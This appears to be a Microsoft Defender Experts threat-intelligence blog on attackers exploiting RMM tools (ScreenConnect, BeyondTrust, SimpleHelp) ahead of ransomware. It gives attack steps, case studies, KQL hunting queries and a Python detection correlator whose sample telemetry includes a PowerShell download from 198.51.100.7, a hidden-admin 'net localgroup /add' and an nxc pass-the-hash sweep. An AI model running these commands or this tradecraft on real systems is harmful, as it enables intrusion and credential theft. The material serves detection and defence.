The double-edged sword of RMM
Remote Monitoring and Management (RMM) tools are indispensable for modern IT operations. They enable administrators to remotely access, troubleshoot, update, and monitor systems—streamlining operations at scale. But these very features make RMM solutions extremely valuable to adversaries.
When attackers compromise an RMM tool, they’re not just breaching a single endpoint—they’re gaining privileged, persistent, and often stealthy access to a wide array of systems. RMM abuse gives adversaries an immediate pivot for post-exploitation activities like credential harvesting, lateral movement, and data exfiltration.
In 2024 and early 2025, Microsoft Defender Experts observed exploitation of zero-day vulnerabilities across multiple RMM platforms, including ConnectWise ScreenConnect, BeyondTrust Remote Support, and SimpleHelp. These weren't isolated incidents. They were part of coordinated, hands-on-keyboard intrusions by threat actors ranging from financially motivated groups to nation-state adversaries, who moved fast to weaponize the flaws for initial access, lateral movement, and ransomware deployment.
This blog unpacks the key vulnerabilities, real-world attack flows, and detection insights gleaned from incidents tracked by Defender Experts.
Why RMM exploits matter more than ever
RMM is not just remote access—it’s remote privilege. By compromising an RMM tool, an attacker can instantly:
- Bypass multi-layered defenses
- Operate under trusted software context
That’s why vulnerabilities in these tools—especially those exposed to the Internet—represent high-value, low-effort attack vectors.
Major RMM vulnerabilities overview (2024 – Early 2025)
SimpleHelp vulnerabilities (January 2025)
In early January 2025, Horizon3.ai reported three critical vulnerabilities in SimpleHelp's remote support software: CVE-2024-57727, a path traversal flaw that allowed unauthenticated download of arbitrary files from the server; CVE-2024-57726, a privilege escalation from a low-privileged technician account to server administrator; and CVE-2024-57728, an arbitrary file upload that can lead to remote code execution. SimpleHelp was notified on January 6 and released patched versions between January 8 and 13, underscoring the severity of the flaws.
BeyondTrust Vulnerability (December 2024)
In December 2024, vulnerabilities in BeyondTrust Remote Support came to light after anomalous behaviour was detected on BeyondTrust's cloud platform. Reports indicate that Chinese state-sponsored actors exploited these flaws to reach sensitive government and enterprise systems; the US Treasury Department publicly confirmed that it was among the victims of the BeyondTrust compromise.
ConnectWise ScreenConnect (February 2024)
In February 2024, ConnectWise's ScreenConnect was hit by two major vulnerabilities: CVE-2024-1708, a path traversal flaw, and CVE-2024-1709, an authentication bypass. The latter, rated CVSS 10.0, allowed unauthenticated attackers to create administrator accounts and take full control of the server. Both flaws were rapidly exploited in the wild, with public proof-of-concept exploits appearing within 48 hours of disclosure.
In each case, disclosure of these RMM vulnerabilities was quickly followed by real-world attacks, and attackers weaponized the bugs within days:
- Chinese APTs leveraged BeyondTrust flaws for government intrusions.
- Mass exploitation campaigns used ScreenConnect bugs for initial access and lateral movement.
- SimpleHelp chains enabled unauthenticated attackers to escalate privileges, exfiltrate data, and drop persistent backdoors.
Zooming in on attack paths observed by Defender Experts across multiple cases
In early 2025, threat actors began exploiting vulnerabilities in trusted remote IT tools—specifically BeyondTrust Remote Support and SimpleHelp—to breach major public sector organizations. Targets included entities supporting government operations, critical infrastructure, healthcare, higher education, and essential services such as water and sewage.
Originally intended for legitimate remote access, these tools were repurposed as stealthy intrusion channels. Once inside, adversaries rapidly escalated privileges, moved laterally across networks, and staged environments for ransomware deployment.
Common attack path observed across multiple cases:
Step 1: Abusing trusted remote access - Exploiting vulnerabilities in BeyondTrust Remote Support (formerly Bomgar SCC), ScreenConnect and SimpleHelp to gain initial access to target networks.
Step 2: Scouting the battlefield: internal recon - Once inside, the intruders map out the environment by running host- and domain-level reconnaissance commands. In some cases, to solidify their foothold, they downloaded and executed a second RMM tool for persistence.
Step 3: The ghost admin: creating a hidden backdoor - They created their own inconspicuously named local administrator accounts, a backdoor hidden in plain sight. These accounts gave them long-term access and allowed reconnaissance to continue through the RMM tool.
Step 4: Defense evasion: disabling the safety nets - The attackers disable key defensive controls. Setting the registry value LocalAccountTokenFilterPolicy (under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System) to 1 turns off remote UAC token filtering, so any local account in the Administrators group receives a full, unfiltered administrative token on network logons. That is exactly what pass-the-hash and remote administration over SMB or WMI need from a local account, and it means administrative activity over the network, legitimate or malicious, no longer hits the usual UAC restriction. They also extracted and deployed multiple payloads, including drivers loaded through a dropper binary, likely to tamper with or evade Windows Defender and other endpoint security products.
Step 5: Stealing credentials: the LSASS heist - Next, they turned to credential dumping. Using the "Create dump file" option in Task Manager (taskmgr.exe), they dumped LSASS memory and extracted authentication secrets such as cached passwords, NTLM hashes and Kerberos tickets. With this data they didn't need to guess passwords; they could authenticate as real users.
Step 6: Lateral movement in action - With stolen credentials, they started moving across the network using NetExec (nxc), the successor to CrackMapExec, a network service exploitation tool. They then used Mimikatz to perform a pass-the-hash attack with the compromised user's NTLM hash.
Step 7: Command and control: establishing the covert link - The adversary loaded Ligolo and cloudflared, both tunneling tools, to establish an outbound connection from the compromised host back to their command and control (C2) infrastructure. Because the connection is initiated from inside the network, it passes through firewalls and NAT, giving them persistent remote access and covert control of the compromised system.
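The seven steps above rarely appear in one data source, so the signal a hunter wants is a device on which several of them show up in order. The following is an added example, not Microsoft's code and not one of the Defender Experts queries: a small Python correlator run over constructed records shaped like the DeviceProcessEvents, DeviceRegistryEvents and DeviceFileEvents columns. The device names, timestamps, file names and the 198.51.100.7 download host are constructed sample data, and the keyword lists are assumptions drawn from the steps described above.

```python
"""Correlate the RMM-abuse attack path (steps 2-7 above) across process,
registry and file telemetry. Added example, not Microsoft's code. The
event records are constructed to resemble the DeviceProcessEvents,
DeviceRegistryEvents and DeviceFileEvents columns; keyword lists are
assumptions drawn from the steps described in the text."""
from collections import defaultdict

RMM_PARENTS = ("screenconnect", "bomgar-scc", "remote access", "winpty-agent64", "simplehelp")
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe")
DISCOVERY = ("whoami", "nltest", "net user", "net group", "quser", "tasklist", "dsquery", "systeminfo")
DOWNLOADERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "irm ", "bitsadmin", "certutil")
LATERAL = ("nxc", "netexec", "mimikatz")
TUNNELS = ("ligolo", "cloudflared")

# Step number from the attack path that each stage belongs to.
STEP_OF = {"rmm_discovery": 2, "rmm_download": 2, "admin_account": 3,
           "remote_uac_disabled": 4, "lsass_dump": 5, "lateral_tooling": 6, "c2_tunnel": 7}


def _has_any(text, terms):
    t = text.lower()
    return any(term in t for term in terms)


def classify(ev):
    """Return the attack-path stage an event belongs to, or None if it looks benign."""
    if ev["type"] == "process":
        cmd, fname, parent = ev["cmd"].lower(), ev["file"].lower(), ev["parent"].lower()
        # Step 3: net.exe / net1.exe creating a user or adding one to a local group.
        if fname in ("net.exe", "net1.exe") and "/add" in cmd and ("user" in cmd or "localgroup" in cmd):
            return "admin_account"
        # Step 2: shell spawned by an RMM agent running discovery or download one-liners.
        from_rmm = _has_any(ev["parent_parent"], RMM_PARENTS) and parent in SHELLS
        if from_rmm and _has_any(cmd, DISCOVERY):
            return "rmm_discovery"
        if from_rmm and _has_any(cmd, DOWNLOADERS):
            return "rmm_download"
        # Step 6: NetExec / Mimikatz, or mstsc launched by Mimikatz (pass-the-hash).
        if _has_any(fname, LATERAL) or ("mimikatz" in parent and fname == "mstsc.exe"):
            return "lateral_tooling"
        # Step 7: reverse tunnels.
        if _has_any(fname, TUNNELS) or _has_any(cmd, TUNNELS):
            return "c2_tunnel"
    elif ev["type"] == "registry":
        # Step 4: LocalAccountTokenFilterPolicy = 1 disables remote UAC token filtering.
        if (ev["key"].lower().endswith(r"\policies\system")
                and ev["value"].lower() == "localaccounttokenfilterpolicy"
                and str(ev["data"]) == "1"):
            return "remote_uac_disabled"
    elif ev["type"] == "file":
        # Step 5: Task Manager's "Create dump file" writes lsass.DMP to %TEMP%.
        if ev["parent"].lower() == "taskmgr.exe" and ev["file"].lower() == "lsass.dmp":
            return "lsass_dump"
    return None


def correlate(events):
    """Per device: stages seen in time order, the steps they cover and a score (number of steps)."""
    hits = defaultdict(dict)
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = classify(ev)
        if stage and stage not in hits[ev["device"]]:
            hits[ev["device"]][stage] = ev["ts"]  # keep the first sighting only
    report = {}
    for device, stages in hits.items():
        steps = sorted({STEP_OF[s] for s in stages})
        report[device] = {"stages": list(stages), "steps": steps, "score": len(steps)}
    return report


# Constructed sample telemetry: one compromised jump host and one quiet workstation.
SAMPLE_EVENTS = [
    {"ts": "2025-01-14T09:02:11", "device": "JUMP01", "type": "process",
     "parent_parent": "ScreenConnect.ClientService.exe", "parent": "cmd.exe",
     "file": "nltest.exe", "cmd": "nltest /dclist:corp"},
    {"ts": "2025-01-14T09:03:40", "device": "JUMP01", "type": "process",
     "parent_parent": "ScreenConnect.ClientService.exe", "parent": "powershell.exe",
     "file": "powershell.exe",
     "cmd": "powershell -c (New-Object Net.WebClient).DownloadFile('http://198.51.100.7/a.zip','C:\\Users\\Public\\a.zip')"},
    {"ts": "2025-01-14T09:05:02", "device": "JUMP01", "type": "process",
     "parent_parent": "ScreenConnect.ClientService.exe", "parent": "cmd.exe",
     "file": "net.exe", "cmd": "net localgroup administrators svc_backup /add"},
    {"ts": "2025-01-14T09:06:30", "device": "JUMP01", "type": "registry",
     "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
     "value": "LocalAccountTokenFilterPolicy", "data": "1"},
    {"ts": "2025-01-14T09:12:15", "device": "JUMP01", "type": "file",
     "parent": "Taskmgr.exe", "file": "lsass.DMP"},
    {"ts": "2025-01-14T09:40:00", "device": "JUMP01", "type": "process",
     "parent_parent": "explorer.exe", "parent": "cmd.exe", "file": "nxc.exe",
     "cmd": "nxc smb 10.10.0.0/24 -u svc_backup -H <nt-hash>"},
    {"ts": "2025-01-14T10:01:09", "device": "JUMP01", "type": "process",
     "parent_parent": "explorer.exe", "parent": "cmd.exe", "file": "cloudflared.exe",
     "cmd": "cloudflared.exe tunnel run --token <token>"},
    {"ts": "2025-01-14T09:30:00", "device": "WS22", "type": "process",
     "parent_parent": "explorer.exe", "parent": "cmd.exe", "file": "whoami.exe", "cmd": "whoami"},
]

if __name__ == "__main__":
    for device, summary in correlate(SAMPLE_EVENTS).items():
        print(device, summary)
```

Each flagged event is mapped to the step it belongs to, so a device that shows steps 2 through 7 in time order is a far stronger signal than any single hit, and the quiet workstation never enters the report. The LSASS stage relies on Task Manager writing lsass.DMP; a dump taken with another tool needs its own rule, and in production the keyword lists would be replaced by the richer conditions in the hunting queries.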
The following case studies showcase real-world intrusions and illustrate the evolving tradecraft used in these RMM-based attacks.
Case Study 01: Pre-Ransomware Intrusion via BeyondTrust in government operations and infrastructure
Microsoft Defender Experts identified a targeted intrusion against a major public sector organization supporting government operations and infrastructure. The activity was attributed to Storm-1175, a financially motivated, China-based threat actor known for deploying Medusa ransomware.
Storm-1175 is known for rapidly exploiting newly disclosed vulnerabilities, particularly in remote monitoring and management (RMM) tools and virtualization platforms. In this case, the actor exploited a vulnerability in BeyondTrust’s RMM software to gain initial access.
Critically, the impacted organization had inadvertently exposed an admin jump server—a high-privilege system—directly to the internet via a remote access solution. This misconfiguration created a direct path to domain admin access, enabling the attacker to bypass internal controls and initiate a hands-on-keyboard intrusion. The threat actor swiftly conducted reconnaissance, escalated privileges, and began staging for ransomware deployment.
This incident highlights the urgent risk posed by trusted IT infrastructure being misconfigured or exposed externally. It reinforces the need for:
- Timely patching of remote access software
- Strict network segmentation for privileged assets
- Continuous monitoring of administrative systems
- Minimizing public exposure of high-value infrastructure
Misconfigurations—especially involving privileged systems—remain one of the most exploited pathways in human-operated intrusions.
Case Study 02: Pre-Ransomware intrusion via SimpleHelp in critical services sectors
In this case, a threat actor exploited SimpleHelp RMM vulnerabilities to breach organizations in the healthcare and water and sewage services sectors. The intrusion progressed through a coordinated, human-operated attack chain, starting with RMM exploitation and escalating to credential theft, lateral movement, and ransomware staging.
Key actions included:
- Creation of stealthy local admin accounts for persistence
- Credential dumping via LSASS memory access
- Lateral movement using Pass-the-Hash and NetExec
- Defender evasion and tunnelling with Ligolo and cloudflared for C2
This intrusion underscores the critical risk posed by vulnerable remote admin tools in essential service environments—where rapid escalation and lack of segmentation can lead directly to high-impact ransomware events.
Case Study 03: Full-chain ransomware intrusion via ScreenConnect in higher education
In a multi-stage intrusion observed in a higher education institution, threat actors exploited ScreenConnect RMM vulnerabilities to initiate a human-operated ransomware attack that culminated in the deployment of Medusa ransomware by Day 31.
Key phases of the attack:
Day 1–2: Initial access and establishing foothold
- Exploitation of ScreenConnect allowed initial access
- Reconnaissance began immediately using cmd.exe for domain, host, and user enumeration
- Payloads downloaded via PowerShell, wget, and Bitsadmin
- A stealthy user account was created and added to high-privilege groups
- SimpleHelp RMM (installed through its JWrapper-packaged installer) was deployed for persistent remote access
Day 8: Persistence and deeper reconnaissance
- Attackers used NetScan and SimpleHelp to scan the environment
- Credential dumping via taskmgr.exe to extract LSASS memory
- C2 communication established using Ligolo tunneling
Day 31: Lateral movement and impact
- Impacket and PDQ Deploy were used for lateral movement.
- Registry tampering and configuration changes for Defender evasion.
- Signs of hands-on-keyboard activity: file masquerading, a new admin account created with net.exe, and WDigest registry changes that make plaintext credentials recoverable from LSASS.
- Medusa ransomware was deployed.
- Multiple indicators of ransomware-related activity were detected, including dropped payloads and malicious commands executed from compromised accounts.
Key Takeaways:
- Initial access via misconfigured RMM software remains a high-risk vector.
- Credential abuse and remote tool stacking enabled stealthy, prolonged access.
- Delayed ransomware deployment (Day 31) reflects strategic patience and operational control.
- Higher education environments with exposed remote access tools and limited segmentation remain highly vulnerable to these human-operated attacks.
Advanced hunting queries
// Identify suspicious discovery and addition to a local admin group through a RMM session
DeviceProcessEvents
| where InitiatingProcessParentFileName =~ "winpty-agent64.exe"
| where InitiatingProcessFileName in~ ("powershell.exe", "powershell_ise.exe", "cmd.exe", "pwsh.exe")
| where (
FileName in~ ("whoami.exe", "certutil.exe", "quser.exe", "bitsadmin.exe", "dsquery.exe")
or (tolower(ProcessCommandLine) contains "localgroup" and tolower(ProcessCommandLine) contains "/add" and tolower(ProcessCommandLine) contains "administrators")
or ProcessCommandLine has_any ("Invoke-Expression", ".DownloadString", ".DownloadFile", "FromBase64String", "iex ", "iex(", "Invoke-WebRequest", "iwr ", "irm ", "Invoke-RestMethod")
or (FileName =~ "net.exe" and ProcessCommandLine has_any ("user ", " group"))
)

// Identify suspicious discovery activity through RMM application
let RMMBinaries = pack_array("Screenconnect", "Remote Access", "bomgar-scc", "winpty-agent64");
DeviceProcessEvents
| where InitiatingProcessParentFileName has_any (RMMBinaries)
| where InitiatingProcessFileName has "cmd.exe" and ProcessCommandLine has_any ("nltest", "net user", "net group", "tasklist", "iwr", "irm", "iex", "Invoke-Expression", "Invoke-RestMethod", "Invoke-WebRequest", "curl", "Add-MpPreference", "wmic ")
| summarize RMMtool = tostring(make_set(InitiatingProcessParentFileName)), Commands = tostring(make_set(ProcessCommandLine)), CommandCount = array_length(make_set(ProcessCommandLine)), ProcessCount = array_length(make_set(FileName)) by DeviceId
| where ProcessCount > 2 and CommandCount > 2 // Change the value based on the noise

// Identify the execution of NetExec tool
DeviceProcessEvents
| where FileName has "nxc"
| where ProcessCommandLine has_any ("smb", "ldap", "ssh", "ftp", "wmi", "winrm", "rdp", "vnc", "mssql")

// Identify the execution of mstsc through mimikatz
DeviceProcessEvents
| where InitiatingProcessVersionInfoOriginalFileName has "mimikatz"
| where ProcessVersionInfoOriginalFileName has "mstsc"
Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Apply patches provided by respective vendors to address these vulnerabilities.
- Apply mitigations listed in Microsoft’s technique profile on abuse of remote monitoring and management tools
- Refer to our human-operated ransomware overview for general hardening recommendations against ransomware attacks
- Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus tool does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
Microsoft Defender XDR customers can turn on attack surface reduction rules to prevent common attack techniques used in ransomware attacks. Attack surface reduction rules are sweeping settings effective at stopping entire classes of threats.
Reference
CVE-2024-1709 and CVE-2024-1708 vulnerabilities in ConnectWise ScreenConnect: https://security.microsoft.com/intel-profiles/CVE-2024-1709
CVE-2024-57726 - Multiple vulnerabilities found in SimpleHelp Remote Support Software: https://security.microsoft.com/intel-profiles/cve-2024-57726
Appendix
Here’s a concise table that summarizes the vulnerabilities along with key timeline events.